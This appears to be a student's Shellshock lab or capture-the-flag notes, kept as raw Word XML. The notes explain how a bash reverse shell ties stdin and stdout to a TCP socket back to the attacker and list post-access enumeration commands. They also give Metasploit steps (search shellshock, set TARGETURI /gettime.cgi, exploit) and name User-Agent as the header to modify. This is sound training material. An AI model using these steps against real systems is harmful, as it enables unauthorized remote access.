    <w:p w14:paraId="0DC6EB2C" w14:textId="77777777" w:rsidR="007E72DC" w:rsidRPr="007E72DC" w:rsidRDefault="007E72DC" w:rsidP="007E72DC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007E72DC">
        <w:t xml:space="preserve">Bash </w:t>
      </w:r>
      <w:r w:rsidRPr="007E72DC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>opens a TCP connection</w:t>
      </w:r>
      <w:r w:rsidRPr="007E72DC">
        <w:t xml:space="preserve"> to that host/port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DB8B3F" w14:textId="77777777" w:rsidR="007E72DC" w:rsidRPr="007E72DC" w:rsidRDefault="007E72DC" w:rsidP="007E72DC">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007E72DC">
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E72DC">
        <w:t xml:space="preserve"> this creates a network socket from the victim → attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F79998C" w14:textId="585B6E66" w:rsidR="007E72DC" w:rsidRPr="007E72DC" w:rsidRDefault="007E72DC" w:rsidP="007E72DC"/>
    <w:p w14:paraId="67046966" w14:textId="77777777" w:rsidR="007E72DC" w:rsidRPr="007E72DC" w:rsidRDefault="007E72DC" w:rsidP="007E72DC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E72DC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4C4A38" w14:textId="77777777" w:rsidR="007E72DC" w:rsidRPr="007E72DC" w:rsidRDefault="007E72DC" w:rsidP="007E72DC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007E72DC">
        <w:t xml:space="preserve">File </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007E72DC">
        <w:t>descriptors</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E72DC">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC809DB" w14:textId="77777777" w:rsidR="007E72DC" w:rsidRPr="007E72DC" w:rsidRDefault="007E72DC" w:rsidP="007E72DC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007E72DC">
        <w:t xml:space="preserve">0 = </w:t>
      </w:r>
      <w:r w:rsidRPr="007E72DC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>stdin</w:t>
      </w:r>
      <w:r w:rsidRPr="007E72DC">
        <w:t xml:space="preserve"> (input)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412EE349" w14:textId="77777777" w:rsidR="007E72DC" w:rsidRPr="007E72DC" w:rsidRDefault="007E72DC" w:rsidP="007E72DC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007E72DC">
        <w:t xml:space="preserve">1 = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007E72DC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>stdout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007E72DC">
        <w:t xml:space="preserve"> (output)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED2415C" w14:textId="77777777" w:rsidR="007E72DC" w:rsidRPr="007E72DC" w:rsidRDefault="007E72DC" w:rsidP="007E72DC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007E72DC">
        <w:t xml:space="preserve">2 = </w:t>
      </w:r>
      <w:r w:rsidRPr="007E72DC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>stderr</w:t>
      </w:r>
      <w:r w:rsidRPr="007E72DC">
        <w:t xml:space="preserve"> (errors)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23223819" w14:textId="77777777" w:rsidR="007E72DC" w:rsidRPr="007E72DC" w:rsidRDefault="007E72DC" w:rsidP="007E72DC">
      <w:r w:rsidRPr="007E72DC">
        <w:t>0&gt;&amp;1 means:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CECA1B" w14:textId="77777777" w:rsidR="007E72DC" w:rsidRPr="007E72DC" w:rsidRDefault="007E72DC" w:rsidP="007E72DC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007E72DC">
        <w:t xml:space="preserve">“Redirect </w:t>
      </w:r>
      <w:r w:rsidRPr="007E72DC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>stdin (0)</w:t>
      </w:r>
      <w:r w:rsidRPr="007E72DC">
        <w:t xml:space="preserve"> to whatever </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007E72DC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>stdout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007E72DC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (1)</w:t>
      </w:r>
      <w:r w:rsidRPr="007E72DC">
        <w:t xml:space="preserve"> is using.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022C6267" w14:textId="77777777" w:rsidR="007E72DC" w:rsidRPr="007E72DC" w:rsidRDefault="007E72DC" w:rsidP="007E72DC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007E72DC">
        <w:t xml:space="preserve">Since </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007E72DC">
        <w:t>stdout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007E72DC">
        <w:t xml:space="preserve"> is already being sent to the TCP connection, stdin also gets tied to that same socket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC93621" w14:textId="77777777" w:rsidR="007E72DC" w:rsidRDefault="007E72DC"/>
    <w:p w14:paraId="05C031A6" w14:textId="7E213BB3" w:rsidR="007E72DC" w:rsidRPr="007E72DC" w:rsidRDefault="007E72DC">
      <w:r w:rsidRPr="007E72DC">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007E72DC">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007E72DC">
        <w:t xml:space="preserve">/issue is a text file on Linux that usually contains a </w:t>
      </w:r>
      <w:r w:rsidRPr="007E72DC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>welcome message</w:t>
      </w:r>
      <w:r w:rsidRPr="007E72DC">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="007E72DC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OS identification string</w:t>
      </w:r>
      <w:r w:rsidR="00D92483">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519C8EDB" w14:textId="77777777" w:rsidR="00D92483" w:rsidRDefault="00D92483" w:rsidP="00D92483">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22FD64F5" w14:textId="33B8BFA3" w:rsidR="00D92483" w:rsidRPr="00D92483" w:rsidRDefault="00D92483" w:rsidP="00D92483">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D92483">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6E16CA04" w14:textId="77777777" w:rsidR="00D92483" w:rsidRPr="00D92483" w:rsidRDefault="00D92483" w:rsidP="00D92483">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D92483">
        <w:t xml:space="preserve">Short for </w:t>
      </w:r>
      <w:r w:rsidRPr="00D92483">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Unix name</w:t>
      </w:r>
      <w:r w:rsidRPr="00D92483">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B50F270" w14:textId="77777777" w:rsidR="00D92483" w:rsidRPr="00D92483" w:rsidRDefault="00D92483" w:rsidP="00D92483">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D92483">
        <w:t>A command to display system information (kernel + OS details).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A65819" w14:textId="77777777" w:rsidR="007E72DC" w:rsidRDefault="007E72DC"/>
    <w:p w14:paraId="0300D671" w14:textId="723540CC" w:rsidR="00BB5523" w:rsidRDefault="007E72DC">
      <w:r>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB6FAB2" w14:textId="6CFE6FFA" w:rsidR="007E72DC" w:rsidRDefault="007E72DC">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="469087D8" w14:textId="5F66B5ED" w:rsidR="007E72DC" w:rsidRDefault="007E72DC">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/*issue</w:t>
      </w:r>
      <w:r w:rsidR="00D55942">
        <w:t xml:space="preserve">          # info about distribution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CB5C46" w14:textId="4FEF9F92" w:rsidR="007E72DC" w:rsidRDefault="00D92483">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF79205" w14:textId="77777777" w:rsidR="00D92483" w:rsidRDefault="00D92483"/>
    <w:p w14:paraId="48047675" w14:textId="77777777" w:rsidR="00E001AF" w:rsidRDefault="00E001AF"/>
    <w:p w14:paraId="5AB845D6" w14:textId="0566B65D" w:rsidR="00E001AF" w:rsidRPr="00E001AF" w:rsidRDefault="00E001AF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E001AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Automatically:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466B9CD2" w14:textId="3F49ED72" w:rsidR="00E001AF" w:rsidRDefault="003E6D66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7C860D87" w14:textId="634F6B73" w:rsidR="003E6D66" w:rsidRDefault="003E6D66">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6030590A" w14:textId="0CB733C3" w:rsidR="003E6D66" w:rsidRDefault="003E6D66">
      <w:r>
        <w:t>Search shellshock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E12E27D" w14:textId="43B97F21" w:rsidR="003E6D66" w:rsidRDefault="003E6D66">
      <w:r>
        <w:t>Use (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>num”one</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7477F4D5" w14:textId="21B79C82" w:rsidR="003E6D66" w:rsidRDefault="003E6D66">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171F2ABF" w14:textId="170738CC" w:rsidR="003E6D66" w:rsidRDefault="003E6D66">
      <w:r>
        <w:t>Set values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17027655" w14:textId="03F4DE38" w:rsidR="003E6D66" w:rsidRDefault="00543E9F">
      <w:r>
        <w:t>Set TARGETURI /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gettime.cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1AE05683" w14:textId="214AE267" w:rsidR="00543E9F" w:rsidRDefault="007C6448">
      <w:r>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF36509" w14:textId="77777777" w:rsidR="007C6448" w:rsidRDefault="007C6448"/>
    <w:p w14:paraId="70F86AEC" w14:textId="77777777" w:rsidR="00AD1A6B" w:rsidRDefault="00AD1A6B"/>
    <w:p w14:paraId="58E66B9F" w14:textId="37785B2B" w:rsidR="00AD1A6B" w:rsidRPr="00AD1A6B" w:rsidRDefault="00AD1A6B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD1A6B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NOTE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7877F9" w14:textId="439AA3BA" w:rsidR="00AD1A6B" w:rsidRDefault="00AD1A6B">
      <w:r w:rsidRPr="00AD1A6B">
        <w:t>Which HTTP header field is commonly modified to exploit the Shellshock vulnerability?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D58BDC2" w14:textId="7C0DF8B5" w:rsidR="00AD1A6B" w:rsidRDefault="00AD1A6B">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>User-agent</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="52BFC08E" w14:textId="77777777" w:rsidR="007C6448" w:rsidRDefault="007C6448"/>
    <w:sectPr w:rsidR="007C6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2183"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CD8C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C4164"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9AD4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560C3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B5C0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B1BA4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4206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42E9F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6636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27AF8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AE4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31863"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="694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9753E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3892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869906">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1724594162">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="825896834">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="2097896073">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1159034398">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="984352961">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="2042128029">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="508912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8B"/>
    <w:rsid w:val="000A0350"/>
    <w:rsid w:val="001D124A"/>
    <w:rsid w:val="003E6D66"/>
    <w:rsid w:val="004125CE"/>
    <w:rsid w:val="00543E9F"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="007526C0"/>
    <w:rsid w:val="00773B12"/>
    <w:rsid w:val="007C6448"/>
    <w:rsid w:val="007E72DC"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="0086316F"/>
    <w:rsid w:val="00AD1A6B"/>
    <w:rsid w:val="00BB5523"/>
    <w:rsid w:val="00CE35E0"/>
    <w:rsid w:val="00D4016F"/>
    <w:rsid w:val="00D55942"/>
    <w:rsid w:val="00D92483"/>
    <w:rsid w:val="00DA6BBE"/>
    <w:rsid w:val="00DB428B"/>
    <w:rsid w:val="00E001AF"/>
    <w:rsid w:val="00F269C2"/>
    <w:rsid w:val="00F83167"/>
    <w:rsid w:val="00FC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9DF86"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0BFCC38F-1198-43E6-86FC-CEFAD023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26</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-18T05:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-18T05:57:00Z</dcterms:modified>
</cp:coreProperties>
</file>